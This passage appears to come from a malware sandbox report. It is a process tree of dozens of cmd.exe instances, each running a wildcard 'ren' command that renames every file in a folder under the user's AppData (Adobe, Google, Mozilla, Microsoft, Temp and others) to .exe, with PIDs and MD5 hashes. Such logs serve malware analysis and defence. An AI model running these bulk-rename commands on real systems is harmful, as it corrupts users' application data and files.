          • cmd.exe (PID: 7768 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7356 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3868 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7328 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6056 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7496 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\ARM\{291AA914-A987-4CE9-BD63-0C0A92D435E5}\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6096 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\ARM\Acrobat_23.006.20320\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7272 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\ARM\S\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5596 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Color\Profiles\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7856 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5300 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5564 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\CEF\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4424 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Comms\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5000 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\ConnectedDevicesPlatform\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5504 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\D3DSCache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7792 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Google\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7364 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\History\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6056 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Microsoft\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7632 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Mozilla\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8064 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Packages\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7724 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\PeerDistRepub\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6368 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8180 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Publishers\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5744 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\SolidDocuments\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5368 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Temp\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7708 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Temporary Internet Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7388 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\VirtualStore\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5472 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7636 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7856 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\ARM\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7996 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\Color\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6360 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\Acrobat\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4612 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\Acrobat\DC\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4140 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\Acrobat\DC\SOPHIA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1124 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7472 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6096 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7568 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1524 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7740 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6120 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6364 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 760 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6396 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5228 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Network\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7308 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2788 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6324 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7852 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3144 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7232 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 320 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5300 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2676 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\ARM\{291AA914-A987-4CE9-BD63-0C0A92D435E5}\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8180 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\ARM\Acrobat_23.006.20320\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8168 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\ARM\S\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5952 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\Color\Profiles\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5368 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1848 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4204 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\CEF\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7440 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Comms\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6096 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\ConnectedDevicesPlatform\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7808 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\D3DSCache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5300 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Google\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6664 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\History\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1520 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7648 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Mozilla\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 344 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Packages\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5368 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\PeerDistRepub\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7520 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7964 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Publishers\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6500 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\SolidDocuments\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6656 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Temp\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2676 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Temporary Internet Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7884 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\VirtualStore\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
